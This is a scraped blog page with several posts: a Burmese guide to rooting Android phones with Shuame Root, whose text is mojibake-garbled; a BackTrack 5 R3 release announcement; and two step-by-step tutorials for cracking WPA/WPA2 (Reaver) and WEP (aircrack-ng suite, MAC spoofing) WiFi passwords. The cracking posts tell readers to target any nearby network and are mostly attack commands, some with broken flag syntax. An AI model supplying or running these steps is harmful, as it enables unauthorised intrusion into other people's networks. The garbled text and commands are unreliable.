Latest Post :
Recent Post

Shuame Root V1.2.1


แ€แ€›ုแ€္แ€–ုแ€”္း/Tablet ေแ€ာ္ေแ€ာ္แ€™်ားแ€™်ားแ€€ုိ Root แ€œုแ€•္ေแ€•းแ€”ုိแ€„္แ€ဲ့ Shuame Root v1.2.1 แ€€ုိแ€แ€„္ေแ€•းแ€œုိแ€€္แ€•ါแ€แ€š္။ แ€แ€›ုแ€္แ€‘ုแ€္แ€–ုแ€”္း/Tablet ေแ€ြแ€แ€„္แ€™แ€Ÿုแ€္แ€•ါแ€˜ူး ၊ แ€กျแ€ား LG/HTC/Samsung แ€…แ€ဲ့ แ€–ုแ€”္းေแ€ာ္ေแ€ာ္แ€™်ားแ€™်ားแ€€ုိแ€œแ€Š္း แ€’ီ Tool ေแ€œးแ€€ုိแ€กแ€žုံးျแ€•ဳျแ€•ီး root แ€œုแ€•္แ€”ုိแ€„္แ€•ါแ€แ€š္။ Root แ€œုแ€•္แ€›ုံแ€แ€„္แ€™แ€Ÿုแ€္แ€•ါแ€˜ူး ။ Bootloader mode แ€‘ဲแ€แ€„္แ€ာแ€ုိแ‚• ၊ recovery mode แ€‘ဲแ€แ€„္แ€ာแ€ုိแ‚• ၊ แ€–ုแ€”္းแ€›ဲแ‚• Pattern lock แ€€ုိျแ€–ဳแ€္แ€ာแ€ုိแ‚•แ€€ုိแ€•ါแ€œုแ€•္ေแ€†ာแ€„္ေแ€•းแ€”ုိแ€„္แ€•ါေแ€žးแ€แ€š္။Shuame Root v1.2.1 แ€€ုိေแ€กာแ€€္แ€€ link แ€™ွာแ€›แ€šူแ€•ါ။
Shuame Root แ€€ုိแ€กแ€žုံးျแ€•ဳျแ€•ီး Root แ€œုแ€•္แ€–ုိแ‚•แ€กแ€ြแ€€္ แ€€ြแ€”္แ€•်ဴแ€ာแ€™ွာ แ€™ိแ€™ိแ€›ဲแ‚• แ€–ုแ€”္းแ€กแ€™်ိဳးแ€กแ€…ားแ€กแ€œိုแ€€္ Driver แ€žြแ€„္းแ€‘ားแ€–ုိแ‚•แ€œုိแ€•ါแ€แ€š္။ ေแ€กာแ€€္แ€™ွာ แ€€ိုแ€š့္แ€–ုแ€”္းแ€”ဲแ‚•แ€†ုိแ€„္แ€ဲ့ driver แ€€ုိေแ€›ြးแ€်แ€š္แ€›แ€šူแ€•ါ။

Mobile Driver แ€กားแ€›แ€šူแ€›แ€”္


Driver แ€›แ€šူျแ€•ီးျแ€•ီแ€†ုိแ€›แ€„္ေแ€ာ့ แ€€ြแ€”္แ€•်ဴแ€ာแ€™ွာ Driver แ€€ို install แ€œုแ€•္แ€‘ားแ€•ါ။
ျแ€•ီးแ€œွ်แ€„္ แ€ုแ€”แ€€ download แ€œုแ€•္แ€ဲ့แ€ဲ့ Shuame Root v1.2.1 แ€€ုိ แ€€ြแ€”္แ€•်ဴแ€ာแ€™ွာ install แ€œုแ€•္ျแ€•ီး run แ€œုိแ€€္แ€•ါ။ ေแ€กာแ€€္แ€•ါแ€•ုံแ€กแ€ုိแ€„္းေแ€•แšแ€œာแ€•ါแ€™แ€š္။ ေแ€•แšแ€œာแ€›แ€„္ แ€•ုံแ€‘ဲแ€€แ€…แ€€္แ€ုိแ€„္းျแ€•แ€‘ားแ€ဲ့ แ€แ€œုแ€္แ€€ုိแ€žြားแ€•ါ။



ေแ€กာแ€€္แ€•ါแ€กแ€ုိแ€„္းေแ€•แšแ€œာแ€•ါแ€™แ€š္။ ျแ€•ီးแ€›แ€„္แ€–ုแ€”္း/Tablet แ€›ဲแ‚• Setting > Developer Option แ€‘ဲแ€€ USB Debugging แ€€ို enable แ€œုแ€•္แ€‘ားျแ€•ီး แ€–ုแ€”္း/Tablet แ€€ုိแ€€ြแ€”္แ€•်ဴแ€ာแ€”ဲแ‚•แ€်ိแ€္แ€†แ€€္แ€•ါ။ แ€•ုံแ€™ွာ แ€…แ€€္แ€ုိแ€„္းแ€กแ€”ီแ€”ဲแ‚•ျแ€•แ€‘ားแ€ဲ့ แ€แ€œုแ€္แ€€ုိႏွိแ€•္แ€•ါ။


แ€–ုแ€”္း Driver แ€€ုိแ€€ြแ€”္แ€•်ဴแ€ာแ€™ွာแ€žြแ€„္းแ€‘ားျแ€•ီး USB Debugging Setting แ€€ုိ On แ€ဲ့แ€แ€š္แ€†ုိแ€›แ€„္ေแ€ာ့ Root แ€œုแ€•္แ€–ုိแ‚• Alert box ေแ€œးေแ€•แšแ€œာแ€›แ€„္ next แ€œုแ€•္แ€œုိแ€€္แ€›ုံแ€•ါแ€•ဲ ။ Root แ€œုแ€•္แ€›แ€ာแ€€แ€œแ€Š္းแ€กแ€›แ€™္းแ€œြแ€š္แ€•ါแ€แ€š္။
แ€–ုแ€”္းแ€™ွာ Super User (แ€žုိแ‚•) SU แ€œုိแ‚•ေแ€›းแ€‘ားแ€ဲ့ icon ေแ€œးေแ€ြแ‚•ျแ€•ီแ€†ုိแ€›แ€„္ေแ€ာ့ root process ေแ€กာแ€„္ျแ€™แ€„္ျแ€•ီแ€œုိแ‚•ေျแ€•ာแ€œုိแ‚•แ‡แ€•ါျแ€•ီ။
แ€€ုိแ€š့္แ€›ဲแ‚• แ€–ုแ€”္း/Tablet แ€€ root ျแ€–แ€…္แ€™ျแ€–แ€…္แ€€ုိေแ€ာ့ root checker แ€œုိ android app แ€€ုိแ€žုံးျแ€•ီးแ€…แ€…္ေแ€†းแพแ€€แ€Š့္แ€”ုိแ€„္แ€•ါแ€แ€š္။

creadit to : myanmarmobileapp.com


{[['']]}

BackTrack 5 R3 Released!






The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task.Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.





We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.





{[['']]}

Ways crack WiFi password using WPA/WPA2


In previous articles I have explained the steps to crack WiFi password using WEP . But now many ni dah dah tak network using WEP security type, mostly using WPA/WPA2.

So this time I will briefly describe the steps to crack WPA/WPA2. Remember, all this is for learning purposes, it's up how you use it.

Just like before, you need:

Wireless adapters that can do packet injection. I use Alfa AWUS050NH purchased from eBay.

Linux as an operating system, or the BackTrack Live CD.

Compared with WEP, how to crack WPA/WPA2 is much easier because we will be using Reaver. Easy direction, you just have to wait longer to get results. Let us begin:

1. Install Reaver.




apt-get install reaver

2. Get the interface name of your wireless card.


iwconfig


3. On my computer, Alfa AWUS050NH is wlan1. Next, put your wireless card in monitor conditions.





airmon-ng start wlan1

The screen will display the name of your monitor interfaces are usually mon0. Take note of this name.





4. Get BSSID of WiFi that you want to crack.





airodump-ng wlan1



Note: If the above instructions did not work, replace your wireless card interface name (in my case, it is wlan1) with the name of the monitor interface.

5. Start with Reaver crack.





moninterface reaver-i-b BSSID-vv



For example, my command is     reaver-i mon0-b 34:08:04: C9: D0: 04-vv


Let alone this command runs until Reaver managed to get the password you are looking for.Reaver will display the PSK that you can use to get into the network, such as the diagram below:


Have a try!


{[['']]}

How to crack WiFi password using WEP


WEP is a type of password encryption for WiFi. It is already not widely used anymore because it is very weak and easily broken. For learning purposes, this time I will show you how easy it is to crack WiFi password using WEP.

What you need:
A huge wireless adapter that can do packet injection. Usually the built-in wireless adapter your laptop does not have this function, so you have to get it from the store or online. I use Alfa AWUS050NH that I bought from eBay, about RM70.
Linux as an operating system. You can also use the BackTrack Live CD but I'm more comfortable using Linux Ubuntu completely.

This tutorial is easier to follow if you are familiar with Linux, as well as common use command line in Linux. I will only enter the most important direction only, but usually you'll probably need to install some software to ensure successful.
Ways crack WiFi password using WEP

1. Open the terminal. First of all, you need to get the name of your wireless adapter interfaces for:airmon-ng

On my computer, the interface for my wireless adapter is wlan1. Your computer may be different, so remember the name to be used in subsequent commands.

2. Run the following command. Substituting (interface) with a new name you can last.airmon-ng stop (interface)
ifconfig (interface) down
macchanger - march 00:11:22:33:44:55 (interface)
airmon-ng start (interface)




3. List all the calls that are nearby.airodump-ng (interface)




Select the WiFi network you want to crack the case, and copy the BSSID, channel, and network name. Make sure you select the network using WEP.

4. Run the following command using the new information you can last. Use whatever name you want for the file (filename). Let this process run.airodump-ng-c (channel)-w (filename) - BSSID (BSSID) (interface)




5. Open a terminal and run the other direction in turn. (Essid) is the name of your WiFi rangkian like crack.aireplay-ng -1 0-a (BSSID)-h 00:11:22:33:44:55-e (Essid) (interface)

If it is successful, the message "Association Successful" will be displayed.



6. Run this command to start collecting data about WiFi password that you want to crack.aireplay-ng -3-b (BSSID)-h 00:11:22:33:44:55 (interface)




7. Return to the screen in step 4 and noticed the # data. Wait until the division managed to gather around 10'000 data before you go to the next step. This process usually takes only about 5 to 10 minutes.

8. After collecting enough data, it's time to get a password. Open another terminal and route instructions.aircrack-ng-b (BSSID) (name fail.cap)



If successful, the message "Key Found" will be displayed with your successfully crack the password. You have succeeded!


Reference: Lifehacker


Update: If you have a problem with the channel, use this command to change the channel of your wireless interface. (interface) is a wireless interface card, and $ is the channel number:ifconfig (interface) down
iwconfig (interface) mode managed
ifconfig (Interface) up
iwconfig (interface) channel $
ifconfig (interface) down
iwconfig (interface) mode monitor
ifconfig (Interface) up

Reference: Ubuntu Forums


{[['']]}
 
๐•พ๐–š๐–•๐–•๐–”๐–—๐–™ : ๐•ฎ๐–—๐–Š๐–†๐–™๐–Ž๐–“๐–Œ ๐–‚๐–Š๐–‡๐–˜๐–Ž๐–™๐–Š ๐“จ3๐“š๐“—
๐•ฎ๐–”๐–•๐–ž๐–—๐–Ž๐–Œ๐–๐–™ © 2011~2019 Pro Skill - ๐•ฌ๐–‘๐–‘ ๐•ฝ๐–Ž๐–Œ๐–๐–™๐–˜ ๐•ฝ๐–Š๐–˜๐–Š๐–—๐–›๐–Š๐–‰
๐•ฟ๐–Š๐–’๐–•๐–‘๐–†๐–™๐–Š ๐•ฎ๐–—๐–Š๐–†๐–™๐–Ž๐–“๐–Œ ๐–‚๐–Š๐–‡๐–˜๐–Ž๐–™๐–Š ๐•ป๐–š๐–‡๐–‘๐–Ž๐–˜๐–๐–Š๐–‰ ๐–‡๐–ž ๐“จ3๐“š๐“—
๐•ป๐–—๐–”๐–š๐–‰๐–‘๐–ž ๐–•๐–”๐–œ๐–Š๐–—๐–Š๐–‰ ๐–‡๐–ž ๐•ญ๐–‘๐–”๐–Œ๐–Œ๐–Š๐–—